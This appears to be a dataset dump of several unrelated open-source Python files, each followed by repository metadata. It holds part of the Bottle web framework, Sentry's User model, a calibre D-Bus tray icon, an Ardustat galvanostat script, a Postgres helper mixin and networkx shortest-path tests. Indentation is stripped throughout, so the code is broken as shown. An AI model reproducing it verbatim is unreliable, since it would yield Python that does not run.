etokens = map(re.escape, self._tokens)
pattern_vars = dict(zip(names.split(), etokens))
patterns = (self._re_split, self._re_tok, self._re_inl)
patterns = [re.compile(p%pattern_vars) for p in patterns]
self._re_cache[syntax] = patterns
self.re_split, self.re_tok, self.re_inl = self._re_cache[syntax]
syntax = property(get_syntax, set_syntax)
def translate(self):
if self.offset: raise RuntimeError('Parser is a one time instance.')
while True:
m = self.re_split.search(self.source[self.offset:])
if m:
text = self.source[self.offset:self.offset+m.start()]
self.text_buffer.append(text)
offs = self.offset
self.offset += m.end()
if m.group(1): # Escape syntax
line, sep, _ = self.source[self.offset:].partition('\n')
self.text_buffer.append(self.source[offs+m.start():offs+m.start(1)]+m.group(2)+line+sep)
self.offset += len(line+sep)
continue
self.flush_text()
self.read_code(multiline=bool(m.group(4)))
else: break
self.text_buffer.append(self.source[self.offset:])
self.flush_text()
return ''.join(self.code_buffer)
def read_code(self, multiline):
code_line, comment = '', ''
while True:
m = self.re_tok.search(self.source[self.offset:])
if not m:
code_line += self.source[self.offset:]
self.offset = len(self.source)
self.write_code(code_line.strip(), comment)
return
code_line += self.source[self.offset:self.offset+m.start()]
self.offset += m.end()
_str, _com, _blk1, _blk2, _end, _cend, _nl = m.groups()
if code_line and (_blk1 or _blk2): # a if b else c
code_line += _blk1 or _blk2
continue
if _str: # Python string
code_line += _str
elif _com: # Python comment (up to EOL)
comment = _com
if multiline and _com.strip().endswith(self._tokens[1]):
multiline = False # Allow end-of-block in comments
elif _blk1: # Start-block keyword (if/for/while/def/try/...)
code_line, self.indent_mod = _blk1, -1
self.indent += 1
elif _blk2: # Continue-block keyword (else/elif/except/...)
code_line, self.indent_mod = _blk2, -1
elif _end: # The non-standard 'end'-keyword (ends a block)
self.indent -= 1
elif _cend: # The end-code-block template token (usually '%>')
if multiline: multiline = False
else: code_line += _cend
else: # \n
self.write_code(code_line.strip(), comment)
self.lineno += 1
code_line, comment, self.indent_mod = '', '', 0
if not multiline:
break
def flush_text(self):
text = ''.join(self.text_buffer)
del self.text_buffer[:]
if not text: return
parts, pos, nl = [], 0, '\\\n'+' '*self.indent
for m in self.re_inl.finditer(text):
prefix, pos = text[pos:m.start()], m.end()
if prefix:
parts.append(nl.join(map(repr, prefix.splitlines(True))))
if prefix.endswith('\n'): parts[-1] += nl
parts.append(self.process_inline(m.group(1).strip()))
if pos < len(text):
prefix = text[pos:]
lines = prefix.splitlines(True)
if lines[-1].endswith('\\\\\n'): lines[-1] = lines[-1][:-3]
elif lines[-1].endswith('\\\\\r\n'): lines[-1] = lines[-1][:-4]
parts.append(nl.join(map(repr, lines)))
code = '_printlist((%s,))' % ', '.join(parts)
self.lineno += code.count('\n')+1
self.write_code(code)
@staticmethod
def process_inline(chunk):
if chunk[0] == '!': return '_str(%s)' % chunk[1:]
return '_escape(%s)' % chunk
def write_code(self, line, comment=''):
code = ' ' * (self.indent+self.indent_mod)
code += line.lstrip() + comment + '\n'
self.code_buffer.append(code)
def template(*args, **kwargs):
"""
Get a rendered template as a string iterator.
You can use a name, a filename or a template string as first parameter.
Template rendering arguments can be passed as dictionaries
or directly (as keyword arguments).
"""
tpl = args[0] if args else None
adapter = kwargs.pop('template_adapter', SimpleTemplate)
lookup = kwargs.pop('template_lookup', TEMPLATE_PATH)
tplid = (id(lookup), tpl)
if tplid not in TEMPLATES or DEBUG:
settings = kwargs.pop('template_settings', {})
if isinstance(tpl, adapter):
TEMPLATES[tplid] = tpl
if settings: TEMPLATES[tplid].prepare(**settings)
elif "\n" in tpl or "{" in tpl or "%" in tpl or '$' in tpl:
TEMPLATES[tplid] = adapter(source=tpl, lookup=lookup, **settings)
else:
TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings)
if not TEMPLATES[tplid]:
abort(500, 'Template (%s) not found' % tpl)
for dictarg in args[1:]: kwargs.update(dictarg)
return TEMPLATES[tplid].render(kwargs)
mako_template = functools.partial(template, template_adapter=MakoTemplate)
cheetah_template = functools.partial(template, template_adapter=CheetahTemplate)
jinja2_template = functools.partial(template, template_adapter=Jinja2Template)
def view(tpl_name, **defaults):
""" Decorator: renders a template for a handler.
The handler can control its behavior like that:
- return a dict of template vars to fill out the template
- return something other than a dict and the view decorator will not
process the template, but return the handler result as is.
This includes returning a HTTPResponse(dict) to get,
for instance, JSON with autojson or other castfilters.
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
result = func(*args, **kwargs)
if isinstance(result, (dict, DictMixin)):
tplvars = defaults.copy()
tplvars.update(result)
return template(tpl_name, **tplvars)
elif result is None:
return template(tpl_name, defaults)
return result
return wrapper
return decorator
mako_view = functools.partial(view, template_adapter=MakoTemplate)
cheetah_view = functools.partial(view, template_adapter=CheetahTemplate)
jinja2_view = functools.partial(view, template_adapter=Jinja2Template)
###############################################################################
# Constants and Globals ########################################################
###############################################################################
TEMPLATE_PATH = ['./', './views/']
TEMPLATES = {}
DEBUG = False
NORUN = False # If set, run() does nothing. Used by load_app()
#: A dict to map HTTP status codes (e.g. 404) to phrases (e.g. 'Not Found')
HTTP_CODES = httplib.responses
HTTP_CODES[418] = "I'm a teapot" # RFC 2324
HTTP_CODES[428] = "Precondition Required"
HTTP_CODES[429] = "Too Many Requests"
HTTP_CODES[431] = "Request Header Fields Too Large"
HTTP_CODES[511] = "Network Authentication Required"
_HTTP_STATUS_LINES = dict((k, '%d %s'%(k,v)) for (k,v) in HTTP_CODES.items())
#: The default template used for error pages. Override with @error()
ERROR_PAGE_TEMPLATE = """
%%try:
%%from %s import DEBUG, request
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: {{e.status}}</title>
<style type="text/css">
html {background-color: #eee; font-family: sans-serif;}
body {background-color: #fff; border: 1px solid #ddd;
padding: 15px; margin: 15px;}
pre {background-color: #eee; border: 1px solid #ddd; padding: 5px;}
</style>
</head>
<body>
<h1>Error: {{e.status}}</h1>
<p>Sorry, the requested URL <tt>{{repr(request.url)}}</tt>
caused an error:</p>
<pre>{{e.body}}</pre>
%%if DEBUG and e.exception:
<h2>Exception:</h2>
<pre>{{repr(e.exception)}}</pre>
%%end
%%if DEBUG and e.traceback:
<h2>Traceback:</h2>
<pre>{{e.traceback}}</pre>
%%end
</body>
</html>
%%except ImportError:
<b>ImportError:</b> Could not generate the error page. Please add bottle to
the import path.
%%end
""" % __name__
#: A thread-safe instance of :class:`LocalRequest`. If accessed from within a
#: request callback, this instance always refers to the *current* request
#: (even on a multithreaded server).
request = LocalRequest()
#: A thread-safe instance of :class:`LocalResponse`. It is used to change the
#: HTTP response for the *current* request.
response = LocalResponse()
#: A thread-safe namespace. Not used by Bottle.
local = threading.local()
# Initialize app stack (create first empty Bottle app)
# BC: 0.6.4 and needed for run()
app = default_app = AppStack()
app.push()
#: A virtual package that redirects import statements.
#: Example: ``import bottle.ext.sqlite`` actually imports `bottle_sqlite`.
ext = _ImportRedirect('bottle.ext' if __name__ == '__main__' else __name__+".ext", 'bottle_%s').module
if __name__ == '__main__':
opt, args, parser = _cmd_options, _cmd_args, _cmd_parser
if opt.version:
_stdout('Bottle %s\n'%__version__)
sys.exit(0)
if not args:
parser.print_help()
_stderr('\nError: No application entry point specified.\n')
sys.exit(1)
sys.path.insert(0, '.')
sys.modules.setdefault('bottle', sys.modules['__main__'])
host, port = (opt.bind or 'localhost'), 8080
if ':' in host and host.rfind(']') < host.rfind(':'):
host, port = host.rsplit(':', 1)
host = host.strip('[]')
run(args[0], host=host, port=int(port), server=opt.server,
reloader=opt.reload, plugins=opt.plugin, debug=opt.debug)
# THE END | mit | -874,936,976,201,851,400 | 38.50483 | 108 | 0.566328 | false |
ifduyue/sentry | src/sentry/models/user.py | 1 | 10584 | """
sentry.models.user
~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import logging
import warnings
from bitfield import BitField
from django.contrib.auth.models import AbstractBaseUser, UserManager
from django.core.urlresolvers import reverse
from django.db import IntegrityError, models, transaction
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from sentry.db.models import BaseManager, BaseModel, BoundedAutoField
from sentry.models import LostPasswordHash
from sentry.utils.http import absolute_uri
audit_logger = logging.getLogger('sentry.audit.user')
class UserManager(BaseManager, UserManager):
pass
class User(BaseModel, AbstractBaseUser):
__core__ = True
id = BoundedAutoField(primary_key=True)
username = models.CharField(_('username'), max_length=128, unique=True)
# this column is called first_name for legacy reasons, but it is the entire
# display name
name = models.CharField(_('name'), max_length=200, blank=True, db_column='first_name')
email = models.EmailField(_('email address'), blank=True)
is_staff = models.BooleanField(
_('staff status'),
default=False,
help_text=_('Designates whether the user can log into this admin '
'site.')
)
is_active = models.BooleanField(
_('active'),
default=True,
help_text=_(
'Designates whether this user should be treated as '
'active. Unselect this instead of deleting accounts.'
)
)
is_superuser = models.BooleanField(
_('superuser status'),
default=False,
help_text=_(
'Designates that this user has all permissions without '
'explicitly assigning them.'
)
)
is_managed = models.BooleanField(
_('managed'),
default=False,
help_text=_(
'Designates whether this user should be treated as '
'managed. Select this to disallow the user from '
'modifying their account (username, password, etc).'
)
)
is_sentry_app = models.NullBooleanField(
_('is sentry app'),
null=True,
default=None,
help_text=_(
'Designates whether this user is the entity used for Permissions'
'on behalf of a Sentry App. Cannot login or use Sentry like a'
'normal User would.'
)
)
is_password_expired = models.BooleanField(
_('password expired'),
default=False,
help_text=_(
'If set to true then the user needs to change the '
'password on next sign in.'
)
)
last_password_change = models.DateTimeField(
_('date of last password change'),
null=True,
help_text=_('The date the password was changed last.')
)
flags = BitField(
flags=(
(
'newsletter_consent_prompt',
'Do we need to ask this user for newsletter consent?'
),
),
default=0,
null=True,
)
session_nonce = models.CharField(max_length=12, null=True)
date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
last_active = models.DateTimeField(_('last active'), default=timezone.now, null=True)
objects = UserManager(cache_fields=['pk'])
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['email']
class Meta:
app_label = 'sentry'
db_table = 'auth_user'
verbose_name = _('user')
verbose_name_plural = _('users')
def delete(self):
if self.username == 'sentry':
raise Exception('You cannot delete the "sentry" user as it is required by Sentry.')
avatar = self.avatar.first()
if avatar:
avatar.delete()
return super(User, self).delete()
def save(self, *args, **kwargs):
if not self.username:
self.username = self.email
return super(User, self).save(*args, **kwargs)
def has_perm(self, perm_name):
warnings.warn('User.has_perm is deprecated', DeprecationWarning)
return self.is_superuser
def has_module_perms(self, app_label):
warnings.warn('User.has_module_perms is deprecated', DeprecationWarning)
return self.is_superuser
def get_unverified_emails(self):
return self.emails.filter(is_verified=False)
def get_verified_emails(self):
return self.emails.filter(is_verified=True)
def has_unverified_emails(self):
return self.get_unverified_emails().exists()
def get_label(self):
return self.email or self.username or self.id
def get_display_name(self):
return self.name or self.email or self.username
def get_full_name(self):
return self.name
def get_short_name(self):
return self.username
def get_salutation_name(self):
name = self.name or self.username.split('@', 1)[0].split('.', 1)[0]
first_name = name.split(' ', 1)[0]
return first_name.capitalize()
def get_avatar_type(self):
avatar = self.avatar.first()
if avatar:
return avatar.get_avatar_type_display()
return 'letter_avatar'
def send_confirm_email_singular(self, email, is_new_user=False):
from sentry import options
from sentry.utils.email import MessageBuilder
if not email.hash_is_valid():
email.set_hash()
email.save()
context = {
'user':
self,
'url':
absolute_uri(
reverse('sentry-account-confirm-email', args=[self.id, email.validation_hash])
),
'confirm_email':
email.email,
'is_new_user':
is_new_user,
}
msg = MessageBuilder(
subject='%sConfirm Email' % (options.get('mail.subject-prefix'), ),
template='sentry/emails/confirm_email.txt',
html_template='sentry/emails/confirm_email.html',
type='user.confirm_email',
context=context,
)
msg.send_async([email.email])
def send_confirm_emails(self, is_new_user=False):
email_list = self.get_unverified_emails()
for email in email_list:
self.send_confirm_email_singular(email, is_new_user)
def merge_to(from_user, to_user):
# TODO: we could discover relations automatically and make this useful
from sentry import roles
from sentry.models import (
Activity, AuditLogEntry, AuthIdentity, Authenticator, GroupAssignee, GroupBookmark, GroupSeen,
GroupShare, GroupSubscription, OrganizationMember, OrganizationMemberTeam, UserAvatar,
UserEmail, UserOption,
)
audit_logger.info(
'user.merge', extra={
'from_user_id': from_user.id,
'to_user_id': to_user.id,
}
)
for obj in OrganizationMember.objects.filter(user=from_user):
try:
with transaction.atomic():
obj.update(user=to_user)
except IntegrityError:
pass
# identify the highest priority membership
to_member = OrganizationMember.objects.get(
organization=obj.organization_id,
user=to_user,
)
if roles.get(obj.role).priority > roles.get(to_member.role).priority:
to_member.update(role=obj.role)
for team in obj.teams.all():
try:
with transaction.atomic():
OrganizationMemberTeam.objects.create(
organizationmember=to_member,
team=team,
)
except IntegrityError:
pass
model_list = (
Authenticator, GroupAssignee, GroupBookmark, GroupSeen, GroupShare,
GroupSubscription, UserAvatar, UserEmail, UserOption,
)
for model in model_list:
for obj in model.objects.filter(user=from_user):
try:
with transaction.atomic():
obj.update(user=to_user)
except IntegrityError:
pass
Activity.objects.filter(
user=from_user,
).update(user=to_user)
AuditLogEntry.objects.filter(
actor=from_user,
).update(actor=to_user)
AuditLogEntry.objects.filter(
target_user=from_user,
).update(target_user=to_user)
# remove any duplicate identities that exist on the current user that
# might conflict w/ the new users existing SSO
AuthIdentity.objects.filter(
user=from_user,
auth_provider__organization__in=AuthIdentity.objects.filter(
user=to_user,
).values('auth_provider__organization')
).delete()
AuthIdentity.objects.filter(
user=from_user,
).update(user=to_user)
def set_password(self, raw_password):
super(User, self).set_password(raw_password)
self.last_password_change = timezone.now()
self.is_password_expired = False
def refresh_session_nonce(self, request=None):
from django.utils.crypto import get_random_string
self.session_nonce = get_random_string(12)
if request is not None:
request.session['_nonce'] = self.session_nonce
def get_orgs(self):
from sentry.models import (Organization, OrganizationMember, OrganizationStatus)
return Organization.objects.filter(
status=OrganizationStatus.VISIBLE,
id__in=OrganizationMember.objects.filter(
user=self,
).values('organization'),
)
def get_orgs_require_2fa(self):
from sentry.models import (Organization, OrganizationStatus)
return Organization.objects.filter(
flags=models.F('flags').bitor(Organization.flags.require_2fa),
status=OrganizationStatus.VISIBLE,
member_set__user=self,
)
def clear_lost_passwords(self):
LostPasswordHash.objects.filter(user=self).delete()
# HACK(dcramer): last_login needs nullable for Django 1.8
User._meta.get_field('last_login').null = True
| bsd-3-clause | 7,035,034,941,226,481,000 | 32.283019 | 106 | 0.595333 | false |
jelly/calibre | src/calibre/gui2/dbus_export/tray.py | 1 | 7237 | #!/usr/bin/env python2
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
# Implement the StatusNotifierItem spec for creating a system tray icon in
# modern linux desktop environments. See
# http://www.notmart.org/misc/statusnotifieritem/index.html#introduction
# This is not an actual standard, but is apparently used by GNOME, KDE and
# Unity, which makes it necessary enough to implement.
import os
import dbus
from PyQt5.Qt import (
QApplication, QObject, pyqtSignal, Qt, QPoint, QRect, QMenu, QSystemTrayIcon)
from calibre.gui2.dbus_export.menu import DBusMenu
from calibre.gui2.dbus_export.utils import icon_cache
from calibre.utils.dbus_service import (
Object, method as dbus_method, BusName, dbus_property, signal as dbus_signal)
_sni_count = 0
class StatusNotifierItem(QObject):
IFACE = 'org.kde.StatusNotifierItem'
activated = pyqtSignal(object)
show_menu = pyqtSignal(int, int)
def __init__(self, **kw):
global _sni_count
QObject.__init__(self, parent=kw.get('parent'))
self.context_menu = None
self.is_visible = True
self.tool_tip = ''
self._icon = QApplication.instance().windowIcon()
self.show_menu.connect(self._show_menu, type=Qt.QueuedConnection)
_sni_count += 1
kw['num'] = _sni_count
self.dbus_api = StatusNotifierItemAPI(self, **kw)
def _show_menu(self, x, y):
m = self.contextMenu()
if m is not None:
m.exec_(QPoint(x, y))
def isVisible(self):
return self.is_visible
def setVisible(self, visible):
if self.is_visible != visible:
self.is_visible = visible
self.dbus_api.NewStatus(self.dbus_api.Status)
def show(self):
self.setVisible(True)
def hide(self):
self.setVisible(False)
def toggle(self):
self.setVisible(not self.isVisible())
def contextMenu(self):
return self.context_menu
def setContextMenu(self, menu):
self.context_menu = menu
self.dbus_api.publish_new_menu()
def geometry(self):
return QRect()
def toolTip(self):
return self.tool_tip
def setToolTip(self, val):
self.tool_tip = val or ''
self.dbus_api.NewToolTip()
def setIcon(self, icon):
self._icon = icon
self.dbus_api.NewIcon()
def icon(self):
return self._icon
@classmethod
def supportsMessages(cls):
return False
def emit_activated(self):
self.activated.emit(QSystemTrayIcon.Trigger)
_status_item_menu_count = 0
class StatusNotifierItemAPI(Object):
'See http://www.notmart.org/misc/statusnotifieritem/statusnotifieritem.html'
IFACE = 'org.kde.StatusNotifierItem'
def __init__(self, notifier, **kw):
global _status_item_menu_count
self.notifier = notifier
bus = kw.get('bus')
if bus is None:
bus = kw['bus'] = dbus.SessionBus()
self.name = '%s-%s-%s' % (self.IFACE, os.getpid(), kw.get('num', 1))
self.dbus_name = BusName(self.name, bus=bus, do_not_queue=True)
self.app_id = kw.get('app_id') or QApplication.instance().applicationName() or 'unknown_application'
self.category = kw.get('category') or 'ApplicationStatus'
self.title = kw.get('title') or self.app_id
Object.__init__(self, bus, '/' + self.IFACE.split('.')[-1])
_status_item_menu_count += 1
self.dbus_menu = DBusMenu('/StatusItemMenu/%d' % _status_item_menu_count, bus=bus, parent=kw.get('parent'))
def publish_new_menu(self):
menu = self.notifier.contextMenu()
if menu is None:
menu = QMenu()
if len(menu.actions()) == 0:
menu.addAction(self.notifier.icon(), _('Show/hide %s') % self.title, self.notifier.emit_activated)
# The menu must have at least one entry, namely the show/hide entry.
# This is necessary as Canonical in their infinite wisdom decided to
# force all tray icons to show their popup menus when clicked.
self.dbus_menu.publish_new_menu(menu)
@dbus_property(IFACE, signature='s')
def IconName(self):
return icon_cache().name_for_icon(self.notifier.icon())
@dbus_property(IFACE, signature='s')
def IconThemePath(self):
return icon_cache().icon_theme_path
@dbus_property(IFACE, signature='a(iiay)')
def IconPixmap(self):
return dbus.Array(signature='(iiay)')
@dbus_property(IFACE, signature='s')
def OverlayIconName(self):
return ''
@dbus_property(IFACE, signature='(sa(iiay)ss)')
def ToolTip(self):
# This is ignored on Unity, Canonical believes in user interfaces
# that are so functionality free that they dont need tooltips
return self.IconName, self.IconPixmap, self.Title, self.notifier.toolTip()
@dbus_property(IFACE, signature='a(iiay)')
def OverlayIconPixmap(self):
return dbus.Array(signature='(iiay)')
@dbus_property(IFACE, signature='s')
def AttentionIconName(self):
return ''
@dbus_property(IFACE, signature='a(iiay)')
def AttentionIconPixmap(self):
return dbus.Array(signature='(iiay)')
@dbus_property(IFACE, signature='s')
def Category(self):
return self.category
@dbus_property(IFACE, signature='s')
def Id(self):
return self.app_id
@dbus_property(IFACE, signature='s')
def Title(self):
return self.title
@dbus_property(IFACE, signature='s')
def Status(self):
return 'Active' if self.notifier.isVisible() else 'Passive'
@dbus_property(IFACE, signature='o')
def Menu(self):
return dbus.ObjectPath(self.dbus_menu.object_path)
@dbus_property(IFACE, signature='i')
def WindowId(self):
return 0
@dbus_method(IFACE, in_signature='ii', out_signature='')
def ContextMenu(self, x, y):
self.notifier.show_menu.emit(x, y)
@dbus_method(IFACE, in_signature='ii', out_signature='')
def Activate(self, x, y):
self.notifier.activated.emit(QSystemTrayIcon.Trigger)
@dbus_method(IFACE, in_signature='u', out_signature='')
def XAyatanaSecondaryActivate(self, timestamp):
# This is called when the user middle clicks the icon in Unity
self.notifier.activated.emit(QSystemTrayIcon.MiddleClick)
@dbus_method(IFACE, in_signature='ii', out_signature='')
def SecondaryActivate(self, x, y):
self.notifier.activated.emit(QSystemTrayIcon.MiddleClick)
@dbus_method(IFACE, in_signature='is', out_signature='')
def Scroll(self, delta, orientation):
pass
@dbus_signal(IFACE, '')
def NewTitle(self):
pass
@dbus_signal(IFACE, '')
def NewIcon(self):
pass
@dbus_signal(IFACE, '')
def NewAttentionIcon(self):
pass
@dbus_signal(IFACE, '')
def NewOverlayIcon(self):
pass
@dbus_signal(IFACE, '')
def NewToolTip(self):
pass
@dbus_signal(IFACE, 's')
def NewStatus(self, status):
pass
| gpl-3.0 | -3,887,124,722,416,218,000 | 29.407563 | 115 | 0.637833 | false |
kjiang8/Ardustat | Deprecated_Unsupported/Python_Client/galvanostat_with_connect.py | 1 | 1837 | import numpy
import ardustat_library_simple as ard
import time
import subprocess
import os
import glob
import sys
##Guess a serial port
port = ""
if os.name == "posix":
#try os x
if len(glob.glob("/dev/tty.u*")) > 0:
port = glob.glob("/dev/tty.u*")[0]
elif len(glob.glob("/dev/ttyUSB*")) > 0:
port = glob.glob("/dev/ttyUSB*")[0]
else:
print "can't see any ardustats. PEACE."
sys.exit()
print port
#start a serial forwarder
p = subprocess.Popen(("python tcp_serial_redirect.py "+port+" 57600").split())
print "waiting"
time.sleep(5)
print "going"
#set parameters
read_delay = .5 #second
ardustat_id = 21
file_name = "galvanostat_test"
ardustat_socket = 7777
debug = False
pulse_time = 60*60*10
#Below here no touchy
#connect to to ardustat and setup resistance table
a = ard.ardustat()
a.connect(ardustat_socket)
a.debug = debug
a.load_resistance_table(ardustat_id)
a.ocv()
a.groundvalue = 4
a.moveground()
time.sleep(.2)
a.ocv()
#create arrays + a function for logging data
times = []
potential = []
current = []
time_start = time.time()
cycle = 0
file_name = file_name+"_"+str(int(time_start))+".dat"
def appender(reading):
if reading['valid']:
print reading['cell_ADC'],read['current']
tdiff = str(time.time()-time_start)
out = tdiff+","+str(reading['cell_ADC'])+","+str(read['current'])+","+str(cycle)+"\n"
open(file_name,"a").write(out)
else:
print "bad read"
#Step through values
output = 0
a.ocv()
for i in range(0,20):
time.sleep(.1)
read = a.parsedread()
appender(read)
start_pulse = time.time()
a.galvanostat(-0.001)
while (time.time()- start_pulse) < pulse_time:
time.sleep(read_delay)
read = a.parsedread()
appender(read)
start_pulse = time.time()
a.ocv()
while (time.time()- start_pulse) < 600:
time.sleep(read_delay)
read = a.parsedread()
appender(read)
p.kill()
| bsd-2-clause | 1,281,744,079,879,438,600 | 17.938144 | 87 | 0.672836 | false |
manhg/tokit | tokit/postgres.py | 1 | 4462 | import logging
import shortuuid
import uuid
import momoko
import momoko.exceptions
import psycopg2
from psycopg2.extras import DictCursor, DictRow, register_uuid
import psycopg2.extensions
from tornado.gen import coroutine, sleep
from tornado.web import HTTPError
import tokit
logger = tokit.logger
class DictLogCursor(DictCursor):
def execute(self, sql, args=None):
logger.debug('Excute SQL: %s', self.mogrify(sql, args).decode())
return super().execute(sql, args)
@tokit.on('init')
def pg_init(app):
""" Hook to init Postgres momoko driver.
dsn config is required, with syntax same as Psycopg2 DSN.
Sample env.ini::
[postgres]
dsn=dbname=[APP_NAME]
size=2
"""
env = app.config.env['postgres']
if env.getboolean('log_momoko'):
logging.getLogger('momoko').setLevel(logger.getEffectiveLevel())
momoko_opts = dict(
dsn=env['dsn'],
size=int(env['size']),
max_size=int(env['max_size']),
auto_shrink=env.getboolean('auto_shrink'),
cursor_factory=(DictLogCursor if env.getboolean('log') else DictCursor),
# connection_factory=env.get('connection_factory', None),
)
register_uuid()
app.pg_db = momoko.Pool(**momoko_opts)
try:
app.pg_db.connect()
except momoko.PartiallyConnectedError:
logger.error('Cannot connect')
class PgMixin:
DbIntegrityError = psycopg2.IntegrityError
DbError = psycopg2.Error
@property
def db(self):
return self.application.pg_db
@coroutine
def pg_insert(self, table, fields=None, **data):
"""
Postgres shorcut to insert data
:return int new row's id
Example::
user_id = yield self.pg_insert('users', {"username": "foo", "password": "secret"})
"""
if fields:
data = self.get_request_dict(*fields)
else:
fields = list(data.keys())
assert len(data) > 0 # check data
values = list(data.values())
sql = 'INSERT INTO {} ({}) VALUES ({}) RETURNING id ' \
.format(table,
','.join(fields),
','.join(['%s'] * len(fields))
)
cursor = yield self.pg_query(sql, *values)
return cursor.fetchone()[0]
@coroutine
def pg_getconn(self):
try:
connection = yield self.db.getconn()
return connection
except psycopg2.OperationalError:
yield self.db.connect()
yield sleep(0.5)
try:
connection = yield self.db.getconn()
return connection
except:
raise HTTPError(503, "Database unavailable")
except (momoko.Pool.DatabaseNotAvailable, momoko.exceptions.PartiallyConnectedError):
raise HTTPError(503, "Database unavailable")
@coroutine
def pg_update(self, table, data):
id_value = data.pop('id')
changes = [field + ' = %s' for field in data.keys()]
sql = 'UPDATE {} SET {} WHERE id = %s'.format(table, ','.join(changes))
values = list(data.values()) + [id_value]
cursor = yield self.pg_query(sql, *values)
return cursor
@coroutine
def pg_query(self, query, *params):
""" Low level execuation """
connection = yield self.pg_getconn()
with self.db.manage(connection):
cursor = yield connection.execute(query, params)
return cursor
def pg_serialize(self, row):
if not row:
return
ret = dict(row) if isinstance(row, DictRow) else row
return ret
@coroutine
def pg_select(self, query, *params):
"""
Query and convert each returned row
:return generator
"""
result = yield self.pg_query(query, *params)
return (self.pg_serialize(row) for row in result.fetchall())
@coroutine
def pg_one(self, query, *params):
result = yield self.pg_query(query, *params)
row = result.fetchone()
if row:
return self.pg_serialize(row)
db_insert = pg_insert
db_update = pg_update
db_query = pg_query
db_select = pg_select
db_one = pg_one
class UidMixin:
def pg_serialize(self, row):
ret = PgMixin.pg_serialize(self, row)
if 'id' in ret:
ret['short_id'] = shortuuid.encode(ret['id'])
return ret
| mit | 4,795,081,817,502,400,000 | 27.240506 | 94 | 0.586732 | false |
sserrot/champion_relationships | venv/Lib/site-packages/networkx/algorithms/shortest_paths/tests/test_weighted.py | 1 | 27666 |
import pytest
import networkx as nx
from networkx.utils import pairwise
def validate_path(G, s, t, soln_len, path):
assert path[0] == s
assert path[-1] == t
if not G.is_multigraph():
computed = sum(G[u][v].get('weight', 1) for u, v in pairwise(path))
assert soln_len == computed
else:
computed = sum(min(e.get('weight', 1) for e in G[u][v].values())
for u, v in pairwise(path))
assert soln_len == computed
def validate_length_path(G, s, t, soln_len, length, path):
assert soln_len == length
validate_path(G, s, t, length, path)
class WeightedTestBase(object):
"""Base class for test classes that test functions for computing
shortest paths in weighted graphs.
"""
def setup(self):
"""Creates some graphs for use in the unit tests."""
cnlti = nx.convert_node_labels_to_integers
self.grid = cnlti(nx.grid_2d_graph(4, 4), first_label=1,
ordering="sorted")
self.cycle = nx.cycle_graph(7)
self.directed_cycle = nx.cycle_graph(7, create_using=nx.DiGraph())
self.XG = nx.DiGraph()
self.XG.add_weighted_edges_from([('s', 'u', 10), ('s', 'x', 5),
('u', 'v', 1), ('u', 'x', 2),
('v', 'y', 1), ('x', 'u', 3),
('x', 'v', 5), ('x', 'y', 2),
('y', 's', 7), ('y', 'v', 6)])
self.MXG = nx.MultiDiGraph(self.XG)
self.MXG.add_edge('s', 'u', weight=15)
self.XG2 = nx.DiGraph()
self.XG2.add_weighted_edges_from([[1, 4, 1], [4, 5, 1],
[5, 6, 1], [6, 3, 1],
[1, 3, 50], [1, 2, 100],
[2, 3, 100]])
self.XG3 = nx.Graph()
self.XG3.add_weighted_edges_from([[0, 1, 2], [1, 2, 12],
[2, 3, 1], [3, 4, 5],
[4, 5, 1], [5, 0, 10]])
self.XG4 = nx.Graph()
self.XG4.add_weighted_edges_from([[0, 1, 2], [1, 2, 2],
[2, 3, 1], [3, 4, 1],
[4, 5, 1], [5, 6, 1],
[6, 7, 1], [7, 0, 1]])
self.MXG4 = nx.MultiGraph(self.XG4)
self.MXG4.add_edge(0, 1, weight=3)
self.G = nx.DiGraph() # no weights
self.G.add_edges_from([('s', 'u'), ('s', 'x'),
('u', 'v'), ('u', 'x'),
('v', 'y'), ('x', 'u'),
('x', 'v'), ('x', 'y'),
('y', 's'), ('y', 'v')])
class TestWeightedPath(WeightedTestBase):
def test_dijkstra(self):
(D, P) = nx.single_source_dijkstra(self.XG, 's')
validate_path(self.XG, 's', 'v', 9, P['v'])
assert D['v'] == 9
validate_path(
self.XG, 's', 'v', 9, nx.single_source_dijkstra_path(self.XG, 's')['v'])
assert dict(
nx.single_source_dijkstra_path_length(self.XG, 's'))['v'] == 9
validate_path(
self.XG, 's', 'v', 9, nx.single_source_dijkstra(self.XG, 's')[1]['v'])
validate_path(
self.MXG, 's', 'v', 9, nx.single_source_dijkstra_path(self.MXG, 's')['v'])
GG = self.XG.to_undirected()
# make sure we get lower weight
# to_undirected might choose either edge with weight 2 or weight 3
GG['u']['x']['weight'] = 2
(D, P) = nx.single_source_dijkstra(GG, 's')
validate_path(GG, 's', 'v', 8, P['v'])
assert D['v'] == 8 # uses lower weight of 2 on u<->x edge
validate_path(GG, 's', 'v', 8, nx.dijkstra_path(GG, 's', 'v'))
assert nx.dijkstra_path_length(GG, 's', 'v') == 8
validate_path(self.XG2, 1, 3, 4, nx.dijkstra_path(self.XG2, 1, 3))
validate_path(self.XG3, 0, 3, 15, nx.dijkstra_path(self.XG3, 0, 3))
assert nx.dijkstra_path_length(self.XG3, 0, 3) == 15
validate_path(self.XG4, 0, 2, 4, nx.dijkstra_path(self.XG4, 0, 2))
assert nx.dijkstra_path_length(self.XG4, 0, 2) == 4
validate_path(self.MXG4, 0, 2, 4, nx.dijkstra_path(self.MXG4, 0, 2))
validate_path(
self.G, 's', 'v', 2, nx.single_source_dijkstra(self.G, 's', 'v')[1])
validate_path(
self.G, 's', 'v', 2, nx.single_source_dijkstra(self.G, 's')[1]['v'])
validate_path(self.G, 's', 'v', 2, nx.dijkstra_path(self.G, 's', 'v'))
assert nx.dijkstra_path_length(self.G, 's', 'v') == 2
# NetworkXError: node s not reachable from moon
pytest.raises(nx.NetworkXNoPath, nx.dijkstra_path, self.G, 's', 'moon')
pytest.raises(
nx.NetworkXNoPath, nx.dijkstra_path_length, self.G, 's', 'moon')
